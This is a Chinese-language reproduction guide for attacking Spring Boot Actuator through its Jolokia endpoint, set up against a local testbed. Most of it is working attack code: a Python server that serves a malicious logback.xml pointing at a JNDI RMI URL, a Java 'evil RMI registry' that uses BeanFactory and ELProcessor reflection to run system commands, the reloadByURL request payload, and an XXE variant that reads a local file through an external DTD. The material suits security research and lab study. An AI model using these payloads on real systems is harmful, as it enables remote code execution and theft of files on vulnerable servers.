https://github.com/artsploit/actuator-testbed
这里老外提供了一个简单的漏洞环境,装好maven直接在目录里打包执行
mvn install
mvn spring-boot:run
漏洞复现
首先做好攻击前的准备。
- 一个用于执行系统命令的rmi服务
- 一个中转指向rmi服务的 logback 配置文件
这里我给出我使用的代码
- http://127.0.0.1:1337/logback.xml
用于中转给rmi服务
#!/usr/bin/python
# -*- coding:utf-8 -*-
# @Author : b1u3r
# @Time : 2019/1/11 15:28
import tornado.web
import tornado.ioloop
class IndexHandler(tornado.web.RequestHandler):
def get(self, *args, **kwargs):
self.write("""<configuration>
<insertFromJNDI env-entry-name="rmi://127.0.0.1:1097/jndi" as="appName" />
</configuration>""")
application = tornado.web.Application([
(r'/logback.xml', IndexHandler),
])
if __name__ == "__main__":
application.listen(1337)
tornado.ioloop.IOLoop.instance().start()
- rmi://127.0.0.1:1097/jndi
用于执行系统命令
/**
* @author 浅蓝
* @email [email protected]
* @since 2019/3/15 10:57
*/
import java.rmi.registry.*;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;
public class Test {
public static void main(String[] args) throws Exception {
System.out.println("Creating evil RMI registry on port 1097");
Registry registry = LocateRegistry.createRegistry(1097);
//prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
//redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
ref.add(new StringRefAddr("forceString", "x=eval"));
//expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','calc']).start()\")"));
ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
registry.bind("jndi", referenceWrapper);
}
}
把两个服务都运行起来,确保服务可被访问。
最后启动被攻击的 Spring Boot 服务。
请求payload
http://127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:1337!/logback.xml
还可以用作XXE攻击
import tornado.web
import tornado.ioloop
class IndexHandler(tornado.web.RequestHandler):
def get(self, *args, **kwargs):
self.write("""<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE a [ <!ENTITY % remote SYSTEM "http://127.0.0.1:8080/file.dtd">%remote;%int;]>
<a>&trick;</a>""")
application = tornado.web.Application([
(r'/logback.xml', IndexHandler),
])
if __name__ == "__main__":
application.listen(1337)
tornado.ioloop.IOLoop.instance().start()
import tornado.web
import tornado.ioloop
class IndexHandler(tornado.web.RequestHandler):
def get(self, *args, **kwargs):
self.write("""<!ENTITY % d SYSTEM "file:///D:/hello.txt">
<!ENTITY % int "<!ENTITY trick SYSTEM ':%d;'>">""")
application = tornado.web.Application([
(r'/file.dtd', IndexHandler),
])
if __name__ == "__main__":
application.listen(8080)
tornado.ioloop.IOLoop.instance().start()
参考
https://github.com/mpgn/Spring-Boot-Actuator-Exploit
https://lucifaer.com/2019/03/11/Attack Spring Boot Actuator via jolokia Part 1/
https://www.veracode.com/blog/research/exploiting-spring-boot-actuators